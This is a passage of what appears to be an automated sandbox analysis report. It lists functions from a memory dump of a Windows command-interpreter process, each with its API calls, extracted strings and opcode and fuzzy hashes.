                                    • Opcode Fuzzy Hash: 77fa3b9015e4fa74c4e1c1616ef2b14e436a23b6f85ebab8c8c6beafb079d4a7
                                    • Instruction Fuzzy Hash: 1F311832608602ABFF3CA77ABC1DFAB26DDDB95564B14441EF512D11C4EF319002C766
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DF300, Relevance: 31.9, APIs: 15, Strings: 3, Instructions: 441COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: iswspace$wcschr$iswdigit$_setjmp3
                                    • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                    • API String ID: 1805751789-2755026540
                                    • Opcode ID: d25baac2e000737c5fe1537f19ac4be1d87a99457f72269128c39179d34e263a
                                    • Instruction ID: 3b2e26927944b91f88d64370b0b0d0722f7b0f0ba93f8f8ff0ccbb8749d1bbe7
                                    • Opcode Fuzzy Hash: d25baac2e000737c5fe1537f19ac4be1d87a99457f72269128c39179d34e263a
                                    • Instruction Fuzzy Hash: F4E10675A00213AADF3D8F6DA94C3BA3BA0AF05258F594126ED47D7292E734C783C752
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F9583, Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 247COMMON
                                    Download Yara Rule
                                    APIs
                                    • _wcsupr.MSVCRT ref: 011F9629
                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 011F968F
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 011F9697
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F96A7
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F96BD
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 011F96C5
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F96D5
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F96E9
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 011F974C
                                    • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 011F9753
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,00000001,?), ref: 011F976C
                                    • towupper.MSVCRT ref: 011F978D
                                    • wcschr.MSVCRT ref: 011F97E6
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 011F9818
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 011F9826
                                      • Part of subcall function 011E0178: _get_osfhandle.MSVCRT ref: 011E0183
                                      • Part of subcall function 011E0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                      • Part of subcall function 011DDB92: _close.MSVCRT ref: 011DDBC1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_close_get_osfhandle_wcsuprtowupperwcschr
                                    • String ID: <noalias>$CMD.EXE
                                    • API String ID: 2015057810-1690691951
                                    • Opcode ID: 9ebae59d47204f767e2cc653ff14754d2f9e49e39fdf8f7df4d46377846410a5
                                    • Instruction ID: 60a33344397155c4b31afdd1e785ca39ac74416fc1a4e70281673e98e544ff37
                                    • Opcode Fuzzy Hash: 9ebae59d47204f767e2cc653ff14754d2f9e49e39fdf8f7df4d46377846410a5
                                    • Instruction Fuzzy Hash: 5F81DA71E002189BDF28EFB8D858BEE7BB5AF55618F08021DFE02A7284DB719945CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F1C79, Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 166windowthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000,?,?,00000000), ref: 011F1D51
                                    • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 011F1DB8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: CurrentFormatMessageThread
                                    • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%d)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                    • API String ID: 2411632146-2849347638
                                    • Opcode ID: 3f9c48d63387b4ee8cca38820414baae4e9395b5b24790d64c523bdc13b3a5f0
                                    • Instruction ID: 11ef462c5647e08d3f75faa70b0c3cdbd028b8f7b44a4285ebacfc2e7a8eb1e1
                                    • Opcode Fuzzy Hash: 3f9c48d63387b4ee8cca38820414baae4e9395b5b24790d64c523bdc13b3a5f0
                                    • Instruction Fuzzy Hash: F15122B1900711FBEB3DAF699C08EABBBB8EB54300F00455DF32A92552D7719980CB22
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DE560, Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 306COMMON
                                    Download Yara Rule
                                    APIs
                                    • _tell.MSVCRT ref: 011DE5F9
                                    • _close.MSVCRT ref: 011DE62C
                                    • memset.MSVCRT ref: 011DE6CC
                                    • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 011DE736
                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011DE747
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DE772
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: ConsoleInfoOutput_close_tellmemset
                                    • String ID: GOTO$KERNEL32.DLL$SetThreadUILanguage
                                    • API String ID: 1380661413-3584302480
                                    • Opcode ID: bb479d3c5bf83f5ad12288b8a65ce6467749bebcc067ad474f9779c70f92ee1d
                                    • Instruction ID: 6dc516c65a3c5d278609d9408169d379666fc48460fcd179a318d4dcd9cfbe24
                                    • Opcode Fuzzy Hash: bb479d3c5bf83f5ad12288b8a65ce6467749bebcc067ad474f9779c70f92ee1d
                                    • Instruction Fuzzy Hash: 53B1F4306097118BDB3DDFA8E45872A7BE1BF84719F05052DE9468B294EB71D885CF83
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DD120, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 177fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,?,0000000C,00000004,00000080,00000000), ref: 011DD18E
                                    • _open_osfhandle.MSVCRT ref: 011DD1A2
                                    • _wcsicmp.MSVCRT ref: 011DD1EF
                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,00000003,0000000C,00000003,00000080,00000000,011FF830,00002000), ref: 011DD221
                                    • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?), ref: 011DD25F
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 011DD287
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000001,?,00000000), ref: 011DD2A3
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,FFFFFFFF,00000002), ref: 011EB5B4
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 011EB5CF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: File$Pointer$Create$ReadSize_open_osfhandle_wcsicmp
                                    • String ID: con
                                    • API String ID: 686027947-4257191772
                                    • Opcode ID: 64c3505c91936b72e4b3a4c85733a80c722dd3887d70ba059809142a7a20a573
                                    • Instruction ID: 66505b56df8f293d09b86d5a0b2db156b08ff371d17eb2aad300261ee6bbb50f
                                    • Opcode Fuzzy Hash: 64c3505c91936b72e4b3a4c85733a80c722dd3887d70ba059809142a7a20a573
                                    • Instruction Fuzzy Hash: AC51F870A00214ABEF28CBE8FC4DBBE7AF9EF45724F110219F925E22C4DB7199458751
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DCEA9, Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 167COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 011DCEDD
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,-00000001), ref: 011DCF19
                                      • Part of subcall function 011DCFBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,011FF830,00002000,?,?,?,?,?,011E373A,011D590A,00000000), ref: 011DCFDF
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD005
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD01B
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD031
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD047
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD05D
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD073
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD085
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD09B
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DCF8F
                                    • exit.MSVCRT ref: 011EB424
                                    • _wcsupr.MSVCRT ref: 011EB475
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: _wcsicmp$memset$EnvironmentFileModuleNameVariable_wcsuprexit
                                    • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                    • API String ID: 2336066422-4197029667
                                    • Opcode ID: 6ab7b19cae45f4baaf6f83616a21bb29c37f8a13c9227a95be69f45e64075f1c
                                    • Instruction ID: b3eeafd94dc2fe9e9e3be91e5d79259d8d0dbc66d93d7a167d8106944e83d4a4
                                    • Opcode Fuzzy Hash: 6ab7b19cae45f4baaf6f83616a21bb29c37f8a13c9227a95be69f45e64075f1c
                                    • Instruction Fuzzy Hash: 6651E531B0461A97DF2CDBA5985C6FFB7A5EFA0108B04449DE817A3184DF349D45CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E33FC, Relevance: 24.3, APIs: 16, Instructions: 307COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011E0D51: memset.MSVCRT ref: 011E0D7D
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?,?,?,?,?), ref: 011E34B1
                                    • towupper.MSVCRT ref: 011E34C6
                                    • iswalpha.MSVCRT ref: 011E34DB
                                    • towupper.MSVCRT ref: 011E34FB
                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?), ref: 011E3527
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011E35CA
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011E3617
                                    • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?), ref: 011E3648
                                    • _local_unwind4.MSVCRT ref: 011EDC44
                                    • _local_unwind4.MSVCRT ref: 011EDC66
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: AttributesCurrentDirectoryFile_local_unwind4memsettowupper$FullNamePathiswalpha
                                    • String ID:
                                    • API String ID: 2497804757-0
                                    • Opcode ID: 89757e74eb3fd911d5b0f57a0a9d8bae4b7ff4cf7ee49cf7676934e79042b68d
                                    • Instruction ID: 53e1ceb35c4a0677ef4ab30f813ccce29622c1e74c3a517601df7f046761f210
                                    • Opcode Fuzzy Hash: 89757e74eb3fd911d5b0f57a0a9d8bae4b7ff4cf7ee49cf7676934e79042b68d
                                    • Instruction Fuzzy Hash: F7B1E130E109169ADF2CEBE8E84CAFDB7F4FF14200F454569E52AD3290EB719A80CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DEA40, Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 413COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: wcschr$iswspacelongjmp
                                    • String ID: =,;
                                    • API String ID: 4008636219-1539845467
                                    • Opcode ID: 090fd844132778b0661caa7d76ff908c2c05b314ef849060a375e3c381cf35fc
                                    • Instruction ID: 43664dc3122cc4c10c3e97e971d26d6a92d415cc76c40dbf87aaba725fab154d
                                    • Opcode Fuzzy Hash: 090fd844132778b0661caa7d76ff908c2c05b314ef849060a375e3c381cf35fc
                                    • Instruction Fuzzy Hash: A4D12775A01612CBDF3C9F6CD8487BE7BE5EF4020AF14446EE9469F281EB749980CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011FB9D3, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 154COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 011FBA0F
                                    • memset.MSVCRT ref: 011FBA37
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 011FBAA8
                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 011FBAC7
                                    • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 011FBB0B
                                    • _wcsicmp.MSVCRT ref: 011FBB28
                                    • _wcsicmp.MSVCRT ref: 011FBB4D
                                    • _wcsicmp.MSVCRT ref: 011FBB75
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FBB8F
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FBB99
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                    • String ID: CSVFS$NTFS$REFS
                                    • API String ID: 3510147486-2605508654
                                    • Opcode ID: f5cb1b98b98330f5ca5b9354e9a59bc48fd6f4c930044e61112adaf2d658705a
                                    • Instruction ID: 3db9261824c524a6b4d51de2342579f8ebcffa884e9a100c7a087b82e7a779f9
                                    • Opcode Fuzzy Hash: f5cb1b98b98330f5ca5b9354e9a59bc48fd6f4c930044e61112adaf2d658705a
                                    • Instruction Fuzzy Hash: A1515971A0421D9FEF39CAA5DC88BEBBBB8EF14254F4400ADE605D3145DB74DA84CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D9520, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 128COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: _wcsicmp
                                    • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                    • API String ID: 2081463915-3124875276
                                    • Opcode ID: 8e707505f1527dff521f1d85b8678826c74bf4a0f7a09bff22bbc1ba2f659c02
                                    • Instruction ID: 1c8a1eec7a84777907af1baae7f2797f17b6388be35321655d3d405e1e917a4b
                                    • Opcode Fuzzy Hash: 8e707505f1527dff521f1d85b8678826c74bf4a0f7a09bff22bbc1ba2f659c02
                                    • Instruction Fuzzy Hash: 3A4128313007069AEB3DAF39F869B6A7BA5EB5462CF54012FE213865C1EF72D181C711
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E06C0, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 90COMMON
                                    Download Yara Rule
                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011E06D8
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011F38A5), ref: 011E06E2
                                    • _get_osfhandle.MSVCRT ref: 011E06EF
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E06F9
                                    • _get_osfhandle.MSVCRT ref: 011E071E
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E0728
                                    • _get_osfhandle.MSVCRT ref: 011E0750
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E075A
                                    • _get_osfhandle.MSVCRT ref: 011E0794
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E079E
                                    • _get_osfhandle.MSVCRT ref: 011ECC28
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011ECC32
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: ConsoleMode_get_osfhandle
                                    • String ID: CMD.EXE
                                    • API String ID: 1606018815-3025314500
                                    • Opcode ID: 01a5888d23800d0a3d92f9b70e6f19f1b6809fadd3c3eda2c25a491e1cdc745d
                                    • Instruction ID: b2df2b0f06f3245a785a2f867bdb3917657bd21561ff69f95b3df2b282e24d7a
                                    • Opcode Fuzzy Hash: 01a5888d23800d0a3d92f9b70e6f19f1b6809fadd3c3eda2c25a491e1cdc745d
                                    • Instruction Fuzzy Hash: 8031B1B0B40A04AFDF38DBA8FC1EB253AE4BB14719B08062DF512C2185DBB0D984CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D9835, Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 300COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                    • API String ID: 0-366822981
                                    • Opcode ID: d26f97cd77313ef046d4caf09eb9d126965ad5cbf551f48b37454695618812c5
                                    • Instruction ID: 8f9ec51c66f5d6d6b25f9777ae3baf61cdc8b94a15efac45ad00c52a029cece2
                                    • Opcode Fuzzy Hash: d26f97cd77313ef046d4caf09eb9d126965ad5cbf551f48b37454695618812c5
                                    • Instruction Fuzzy Hash: ADA1E1B070020EFBDF2CDE59C98596E7B27FB88698B10811DF6069B252C7719D91CB83
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DC6F4, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 147windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001A00,00000000,?,00000000,0120B980,00002000,00000000,00000000,?,00000000), ref: 011DC735
                                      • Part of subcall function 011DD7D4: wcschr.MSVCRT ref: 011DD7DA
                                    • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001800,00000000,?,00000000,0120B980,00002000,?), ref: 011DC777
                                    • _ultoa.MSVCRT ref: 011EAF0E
                                    • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 011EAF17
                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000,?,000000FF,?,00000020), ref: 011EAF38
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                    • String ID: Application$System
                                    • API String ID: 3538039442-3455788185
                                    • Opcode ID: e2487abe77ab89d349b284bd426415fbd0543afd3c5013dd0217b18ad43fc1a1
                                    • Instruction ID: 05dde94352ced63d082aad38fd2d9c5ee93768cc0259d28a3f910b6ea27cf815
                                    • Opcode Fuzzy Hash: e2487abe77ab89d349b284bd426415fbd0543afd3c5013dd0217b18ad43fc1a1
                                    • Instruction Fuzzy Hash: FF41E771B007196BDF289BA4DC5DFAEBBA8EB55711F110119F606EB1C0DB709D40CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E04A0, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 110COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: _wcsicmp
                                    • String ID: FOR$FOR/?$IF/?$REM$REM/?
                                    • API String ID: 2081463915-3874590324
                                    • Opcode ID: 611c1124308175d04c15a5d01d8614793ad6044b52ab7373355629c5de85a2b9
                                    • Instruction ID: 8eb187385da68ff4cc7cd007489d28d1ed612b1a834babaa0ba62ce91a1e800a
                                    • Opcode Fuzzy Hash: 611c1124308175d04c15a5d01d8614793ad6044b52ab7373355629c5de85a2b9
                                    • Instruction Fuzzy Hash: A131AF247807128BEF3E6BF9B81D36A26D09F04749F48802AF642952C5DFA091C6C766
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F474C, Relevance: 18.2, APIs: 12, Instructions: 203COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011E2430: iswspace.MSVCRT ref: 011E2440
                                    • wcsrchr.MSVCRT ref: 011F47C1
                                    • wcschr.MSVCRT ref: 011F47D7
                                    • wcsrchr.MSVCRT ref: 011F4809
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 011F4828
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F4838
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F4854
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 011F485C
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F4870
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 011F4891
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,000003FF,?), ref: 011F48BE
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F4914
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 011F4935
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: ConsoleMode$Handle$wcsrchr$iswspacewcschr
                                    • String ID:
                                    • API String ID: 4166807220-0
                                    • Opcode ID: feb92c1057ab0264ce8de76f445391a2f9bb90ab11888967d501e019172ba27e
                                    • Instruction ID: cf5ea08ca5dbc6c56bd1edcd91df0f1f0d025a92a1e8be328efb88a7cff37b97
                                    • Opcode Fuzzy Hash: feb92c1057ab0264ce8de76f445391a2f9bb90ab11888967d501e019172ba27e
                                    • Instruction Fuzzy Hash: F351D7316002199AEF39EB78EC18BBA77F8FF14314F0485ADE645C2580EF708985CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DC430, Relevance: 18.2, APIs: 8, Strings: 4, Instructions: 155memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,0000000C), ref: 011DC489
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011DC490
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000), ref: 011DC4A6
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011DC4AD
                                    • _wcsicmp.MSVCRT ref: 011DC538
                                    • _wcsicmp.MSVCRT ref: 011DC54A
                                    • _wcsicmp.MSVCRT ref: 011DC577
                                    • _wcsicmp.MSVCRT ref: 011EA932
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Heap_wcsicmp$AllocProcess
                                    • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                    • API String ID: 435930816-3086019870
                                    • Opcode ID: f97d90736b195a60c8569bb1f6290ba6137d50272b51b8141da158bcb1f471f0
                                    • Instruction ID: d6c9d0c1d99095b623c986b5dd1170a49416d7388a99cee5ea1ecac3c27d52b1
